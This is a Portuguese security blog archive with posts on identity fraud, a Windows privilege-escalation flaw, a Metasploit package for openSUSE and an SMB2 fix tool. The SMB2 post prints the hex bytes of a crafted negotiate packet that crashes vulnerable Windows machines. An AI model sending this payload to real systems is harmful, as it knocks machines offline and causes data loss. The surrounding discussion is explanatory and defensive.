You are currently browsing the category archive for the ‘Segurança’ category.

Em pleno século XXI as pessoas do mal estão deixando de olhar para grandes cofres e passaram a olhar para as informações. Como consequência, pessoas mal-intencionadas em posse de algumas informações  junto a sua identidade (que pode ser clonada facilmente) pode trazer grandes transtornos. Por isto me empenhei exaustivamente no desenvolvimento técnico do Certiface. Sabendo o perfil do usúario, costumes, com um CPF em mãos fica muito fácil obter crédito em nome de terceiros. A facilidade do mercardo proporcionar cartões de crédito torna este cenário mais caótico. Pois com alguns poucos dados, basta preencer um cadastro e apresentar para um funcionário novo com pouco experiência de vida (preferencialmente com menos de 21 anos). Com informação obtida de maneira escalar o processo avança em velocidades incríveis, pois o fraudador precisa utilizar o mais breve possível os dados válidos em mãos (até que o verdadeiro usuário tomem conhecimento).

“Ladrões de identidade podem usar um número de seguro social para obter seus benefícios médicos, fundo de garantia, seguro desemprego e até mesmo direcionar as acusações criminais para você quando eles tiverem problemas com a lei. As possibilidades são infinitas com a informação correta e um ladrão bem informado. Verificar nas agências de proteção ao crédito não vai mostrar se alguém estiver enfrentando acusações criminais usando seu nome, usando seu plano de saúde para financiar procedimentos médicos, ou criando um histórico fraudulento de trabalho, ao usar suas informações para trabalhar.”

    Fonte: Gizmodo Brasil

Vejam o vídeo a seguir (tutorial sobre falsificação) e entendam/conheçam o CERTIFACE (já mencionado neste blog). Pois é uma nova maneira para auxiliar o mercado no combate à fraude. Este produto foi desenvolvido junto a minha equipe com muito empenho e dedicação (obrigado a todos).

Depois dos posts sobre a vulnerabilidade do windows e como se proteger, surge dia 19 de janeiro de  2010 uma falha que atinge toda a família windows (NT até o  Seven, exceto 95 e 98). A falha basicamente permite que um usuário sem direito algum obtenha  direitos do usuário SYSTEM. Mais um pepino para Redmond gerenciar.

O usuários system é usado no momento que nenhum usuário está logado, pois para os programas funcionarem, eles precisam de uma conta de usuário, este processos usarão as configurações de personalizações e segurança do perfil desse usuário. Mesmo após o logon, se você abrir a guia “Processos” do Gerenciador de tarefas, verá que alguns programas são executados por essa conta, “SYSTEM”. Muitos destes serviços essenciais são inicializados antes do ponto de logon, onde não existe interação com o usuário. Qualquer programa executado com o usuário SYSTEM, tem direitos de administrativos…

Informações sobre falha descoberta por Tavis Ormandy AQUI. Como também o binário ( vdmallowed.exe e vdmexploit.dll )da prova de conceito seguido do código fonte AQUI (portal  Exploit database)! Logo abaixo um vídeo demonstrativo. Aos usuários Windows só resta espera o pacote de correção.

Acabo de disponibilizar o  pacote metasploit para o openSUSE. “O Metasploit framework é um conjunto das melhores plataformas de aprendizagem e investigação para o profissional de segurança ou do hacker ético. Ele possui centenas de exploits, payloads e ferramentas muito avançadas que nos permite testar vulnerabilidades em muitas plataformas, sistemas operacionais e servidores.” Mais informações no Viva o Linux CLARO!

Metasploit 3.3.3
32 e 64 Bits

Não gosto do Windows e ponto final. Mas gostos de muitas  pessoas que utilizam Windows (infelizmente)… Imaginem a minha irmã ( a neném ) por exemplo, trabalhando em seu desktop, e um engraçadinho enviar um pacote de negociação SMB2 adulterado para a  sua máquina (mencionado no post anterior) ! Como quase todo  usuário não tem o hábito de salvar periodicamente os seus trabalhso durante a elaboração, provalvelmente será perdido todo o  esfoço  com  a famosa tela azul da morte.

Sendo assim elaborei um pequeno e  modesto programa  para desabilitar o protocolo SMB2 ( assim forçando  o uso do SMB1 ).   Qualquer técnico  para  fazer isto manualmente mas  usuários convencionais podem cometer erros  graves  ao efetuar esta tarefa.

bsodTest, foi o  nome atribuído ao projeto,  disponibilizado no Source Forge.net! Primeiramente, baixe o  executável e o execute como administrador do sistema.

01

ATENÇÃO: FECHE TODOS OS  PROGRAMAS  !!! E logo  a seguir, faça o download e descompacte o  arquivo .zip e execute  o programa com o parâmetro -testbug. Para testar a vulnerabilidade no seu sistema  operacional.

02Se  o seu sistema não apresentar a tela azul, significa que você pode ignorar  o restante do texto. Caso contrário, execute novamente  o programa (após  o boot da tela azul) com  o parâmetro -fixbug e faça  o  teste novamente.

05

Pronto ! Agora o protocolo de  negociaçao SMB2 esta desabilitado. Esta é uma alternativa para não deixar a sua máquina vulnerável até a correção  ser  liberada pelo fabricante do sistema operacional.

bsodJogando conversar fora e tomando uma cerveja com o Carlão (Carlos Barcellos), ele mencionou sobre uma falha de  negociação no protocolo SMB2 do Windows. Na hora não dei muita atenção, pois pensei que tal  vulnerabilidade não atingiria as maquinas com o sistema operacional atualizado. Para a  minha surpresas, todas as máquinas submetidas ao teste sofreram a famosa BSOD (blue screen of death)  seguido do desligamento imediato.

A vulnerabilidade ocorre no protocolo SMB2 (Server Message Block — versão 2) da Microsoft,  localizado na camada de rede, utilizado geralmente para o acesso aos recursos compartilhados e autenticação IPC (Comunicação Inter-Processo).

Este  protocolo é o padrão de compartilhamento de arquivos entre computadores rodando Windows, e especificamente a versão 2 (SMB2) pode ser derrubada por um código de prova de conceito. Por questões éticas não disponibilizarei  o código. A seguir a lista das versão comprometidas:

  • Windows 7 (32 e 64 bits);
  • Vista, Vista SP1, Vista SP2 (32 e 64 bits);
  • Windows 2008, e 2008 SP2 (32 e 64 bits, e Itanium-based).

“Esse método ataca via negociação de requisição de protocolo (negotiate protocol request) que é a primeira query enviada pelo SMB. A vulnerabilidade está presente apenas nas versões de Windows que incluem o Server Message Block 2.0 e tem o protocolo ativado. O sucesso no ataque não requer acesso local na máquina e resulta na Tela Azul da Morte (Blue Screen of Death).”

smb

A seguir, uma versão do pacote modificado:

 0x01, 0x00, 0x00, 0x90, // Cabecalho
 0xff, 0x53, 0x4d, 0x42, // String SMB
 0x72, 0x00, 0x00, 0x00, // Protocolo de negociacao
 0x00, 0x18, 0x53, 0xc8, // Codigo operacao 0x18 & sub 0xc853
 0x00, 0x26,             // Valor antigo esperado pelo protocolo "\x00\x00"
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xfe,
 0x00, 0x00, 0x00, 0x00, 0x00, 0x6d, 0x00, 0x02, 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54,
 0x57, 0x4f, 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, 0x41, 0x4d, 0x20, 0x31,
 0x2e, 0x30, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, 0x30, 0x00,
 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,
 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61,
 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4c,
 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c,
 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00, 0x02, 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e,
 0x30, 0x30, 0x32, 0x00
OBS: Como mencionou o José Mateus Ucelli, quem conseguir controlar esse ponteiro na hora do estouro da pilha, pode apontar para execuçao de qualquer programa na memória…

OBS2: Sugiro aos usuários Windows (credo!) ficarem atentos com relação ao problema, e consequentemente  buscarem a  solução o mais breve possível junto ao fornecedor do sistema operacional. Pois códigos maliciosos surgirão de forma exponencial.

Fontes de informação:
Hack A Day

Arquivo

Statísticas

  • 550,158 Acessos

ATENÇÃO!

 °v° USE A FORÇA,
/(_)\ LEIA OS FONTES !
 ^ ^

openSUSE 11.4